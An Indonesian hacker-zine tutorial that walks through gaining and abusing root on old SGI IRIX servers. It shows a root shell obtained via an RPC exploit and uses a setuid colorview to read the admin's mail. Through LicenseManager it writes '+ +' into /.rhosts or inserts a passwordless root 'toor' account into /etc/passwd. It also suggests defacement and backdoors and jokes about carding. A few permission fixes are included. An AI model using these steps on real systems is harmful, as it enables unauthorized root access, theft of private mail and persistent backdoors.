Exploitasi Bug Pada IRIX Versi 5.2, 5.3, 6.2, 6.3, 6.4, 6.5, 6.5.2


telkom tv

Oleh GunungBatu at #GangkNet
Server yang memakai IRIX. He.. he.. bosen? Dah lama.. Tapi enggak juga. Ilmu itu tidak
seperti makanan yang kian lama kalau dibiarkan akan basi.:))Saya pernah baca karya bung Schizoprenic di www.jasakom.com mengenai hacking IRIX. Bagus banget. Oke langsung saja.
Sebetulnya prinsip dasar dari exploit ini adalah dengan mengirimkan bit stack ke RPC daemon yang vulneral di server IRIX, yang mengakibatkan compromise root di daemon, dan hasilnya adalah shell root ;). (Saya ambil contohnya dari tulisannya aja. Untuk menyingkat waktu).

Disaat kita sudah mencoba mendapatkan akses di server tersebut:

adr=0x7fff4fec timeout=10 port=1710 connected! sent!
IRIX bailer 5.2 02282016 IP22 mips                ß Tembus.. :))

whoami

root
id
uid=0(root) gid=0(sys)
uname -a
IRIX bailer 5.2 02282016 IP22 mips

ls -l

total 9043
drwxr-xr-x     2 root     sys            9 Oct  7  1996 CDROM
drwx——      2 root     sys           30 Jul 18  1999 Mail
drwxr-xr-x      2 root     sys         4096 Apr 22  1997 TT_DB
dr-xr-xr-x        1 root     sys          512 Nov  8 14:07 arch
lrwxrwxr-x      1 root     sys           25 Sep  3  1999 backup -> local/archive/priv/backup
lrwxr-xr-x       1 root     sys    !         8 Jun 11  1999 bin -> /usr/bin
lrwxr-xr-x       1 root     sys            4 Jun 11  1999 debug -> proc
drwxr-xr-x   15 root     sys        16384 Nov 21 07:35 dev
drwxr-xr-x    3 root     sys           27 Sep 16  1998 dumpster
drwxr-xr-x   16 root     sys        12288 Jan 13 03:06 etc
drwxrwxr-x    9 root     devteam      114 Nov 21 12:50 files
dr-xr-xr-x    1 root     sys          512 Nov  8 14:07 home
drwxr-xr-x   51 root&nb! sp;    sys          737 Nov  1 13:07 lhome
drwxr-xr-x    2 root     sys           90 Aug 18  1998 lib
drwxr-xr-x    2 root     sys           39 Aug 18  1998 lib32
dr-xr-xr-x    1 root     sys          512 Nov  8 14:07 local
drwx——    2 root     sys           50 Feb 27  2000 mail
drwxr-xr-x    2 root     sys            9 Oct  7  1996 mnt
drwxrwxr-x    4 25       news     &nbs! p;   102 Jul 26  1997 news
drwxrwxr-x   10 root     sys          126 Mar 28  2000 nsr
drwxr-xr-x    6 root     sys           65 Sep 15  1998 opt
dr-xr-xr-x    2 root     sys        16048 Jan 13 03:58 proc
drwxr-xr-x    3 root     sys         4096 Apr  6  1999 sbin
drwxr-xr-x    2 root     sys           20 Sep 19  1997 stand
drwxrwxrwt    3 sys      sys           93 Jan 13 03:58 tmp
dr-xr-xr-x    3 root     sys!            23 Oct  7  1996 tmp_mnt
-rw-r–r–    1 root     sys      4565652 Jun 11  1999 unix
drwxr-xr-x   42 root     sys          693 Nov  8 14:07 usr
drwxr-xr-x   32 root     sys         4096 Mar 28  2000 var
drwxr-xr-x   72 root     sys         4096 Nov 15 20:11 www

Dalam konteks ini, saya berpendapat bahwa anda sudah memiliki akses setara root pada
server IRIX tersebut. Selain melakukan deface, bikin backdoor, psyBNC, eggdrop, BNC,
dll, kamu juga bisa membaca file – file pada system adminnya.

Bug pada IRIX versi 5.2 (std release) mengizinkan kita untuk membaca file – file pada
system orang itu. Coba anda kerjakan perintah berikut:

% uname -a

IRIX bailer 5.2 02282016 IP22 mips

% ls -als /usr/sbin/colorview

742 -rwsr-xr-x    1 root     sys       379680 Jun  7 10:36 /usr/sbin/colorview

Contoh yang lebih detail lagi (untuk mengintip email dari adminnya
[hi hi hi.. jangan nakal yah],

% /usr/sbin/colorview -text /var/spool/mail/admin

Nah .. nampak dia…

Aku gak menyarankan anda melakukan apa – apa yang yang berhubungan dengan deface atau yang lainnya yang bersifat destructif. Atau kalau anda mau, kirimkan surat anda ke adminnya. Katakan mengenai hal itu. Saya sering berbuat begitu. Bahkan terkadang saya kirim langsung melalui box e-mailnya sendiri. Ha.. ha.. kagetlah dia. Gak ada yang lebih menyenangkan
selain menerima ucapan terima kasih dari mereka.

Untuk memperbaikinya, ganti aja file permissionsnya,
[mis: chmod 755 batu.c menganti permissions ke rwx/rx/rx for batu.c].

# chmod u-s /usr/sbin/colorview

Kepikir enggak yah :)). Gampang kan.. :))

Sebetulnya cara yang paling efektif untuk mendapatkan root pada sebuah server adalah dengan
memakai exploit yang tepat. Oh iya.. udah tahu belum kalau pada Irix 5.3 and 6.x
license_eoe.sw.license_eoe yang terinstal secara default,  (pada 5.2 sepertinya tidak). Ini
yang kadang bikin masalah.

Salah satu program setara exploit adalah LicenseManager. Yang secara garis besarnya,
LicenseManager adalah GUI subsystem yang resmi dipakai. Kita diizinkan untuk
install/remove/update FLEXlm dan NET_LS licenses. Beberapa pemakai dengan akses ke xscreen dapat juga menjalankannya, dan lumayan bagus. Tentu saja kita harus tahu password rootnya untuk melakukan remove dan lainnya. Untuk keamanannya, kita dapat melakukan:
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &

Install…
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0

(in license version field I put space)

Apply

License(s) succesfully installed

% cat /.rhosts
#:# “whatever” “whatever” “1.000” “Incomplete”
+ +

Bila pada system tersebut remote root loginnya pada keadaan disabled, replacing /.rhosts aja
dengan /etc/passwd dan + + dengan toor:0:0::/:/bin/sh . Biar lebih aman.

Untuk menanggulanginya, cukup ubah aja perizinannya:

chmod -s /usr/etc/LicenseManager

Ngehack melaluli LicenseManager sangat menyenangkan. Mudah lagi. Kamu coba – coba aja.

Pada IRIX  5.3/6.2 yang terinstal, ada sesuatu yang sangat tidak aman dan sering di ganggu gugat. User lokal bisa memakai /usr/bin/X11/cdplayer tanpa izin, dan juga dapat membuat perizinan root yang lain, world-writable untuk mengobah nama pada direktory maupun langsung pada system. Tuh..bahaya khan..Lumayan juga banyak masalah – masalah mengenai kelemahan system IRIX ini, apalagi dengan konfigurasi IRIX standard secara default, yang mana kita dapat mengkonvert suatu perizinan ke perizinan root lain.

Untuk mengatasinya, anda bisa mencoba:

chmod -s /usr/bin/X11/cdplayer

Bisa juga untuk membuat server IRIX anda lebih aman dengan:

systune -i

restricted_chown 1

Entar kamu akan ditanya yang memilih kita menjawab y/n. Tekan y dan Enter, (pada IRIX versi 5.3 harus di boot ulang untuk menyimpan perubahan yang dibuat, sedang untuk 6.2 tidak usah).

Pada /etc/passwd replace aja baris tersebut.

sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh

Dengan baris seperti dibawah pun bisa.

sysadm:*:0:0:System V Administration:/:/bin/nono

Atau lebih simpel, anda cukup membuangnya (remove langsung dengan rm -rf), habis perkara.

Itu aja deh.. Terus terang aku lebih suka membuat sesuatu itu aman, dari pada melakukan tindakan merusak lain. Aku dah mulai kenal rasa takut ini. Habis negara Indonesia kayaknya makin gak aman. Apalagi dunia sepertinya kian kacau. Sapa tau besok atau besoknya besok atau besoknya besok besok kiamat, khan kacau. :)).
————

Semoga dapat membantu. Kritik saran – sarannya serta makian – makiannya ke gununkbatu@yahoo.com aja yah. Atau bisa koq ditanya sama saudara-saudaraku yang ol di #ganknet irc.dal.net Oh iya.. sedikit saya mau mengasih masukan mengenai kegiatan carding di Indonesia. Dulu uang saya pernah ditelan atm BNI Rp 200.000,- (1$ = Rp9.000,- an. Saya waktu itu begitu kelimpungan. Habis
namanya juga anak kost. :)). Kebayang yah sama kita bagaimana perasaan dari orang – orang itu,
sewaktu kita memakai uangnya tanpa setahu dia. :)).  .:: Dia yang mejadikan kaya. Susah payah kita tidak akan menambahinya. Kita semua akan diberi-Nya,
asal rajin meminta ::. Sahabat.. orang yang mau mendengar nasehat adalah calon orang yang berhasil. Aku bukan mengajari,hanya sedikit membagi. Mohon maaf kalau tidak berkenan.

Special thanks to Donald K for his significant contributions to the Fix section.
Thanks also to my friend Firma D. dan semua yang gak bisa gue sebutin namanya satu – persatu.
:: SEKIAN ::.

nb:  utk keperluan mengenai exploitnya, anda bisa menggunakan exploit dibawah:
autofsd2.c
nsdadv.c
inview.c
rpc_ttdserverd.c
arrayd.c
irx_lpsched.c
telnetd.c
autofsd.c
Cari aja diInternet. Banyak koq. Kalau anda kesulitan, layangkan e-mail anda. :)) Kita sama-sama belajar kan…

Terbitan On-Line Kecoak Elektronik (http://www.k-elektronik.org)

Oleh GunungBatu at #GangkNet

Satu tanggapan untuk “Exploitasi Bug Pada IRIX Versi 5.2, 5.3, 6.2, 6.3, 6.4, 6.5, 6.5.2

Tinggalkan Balasan ke tiar Batalkan balasan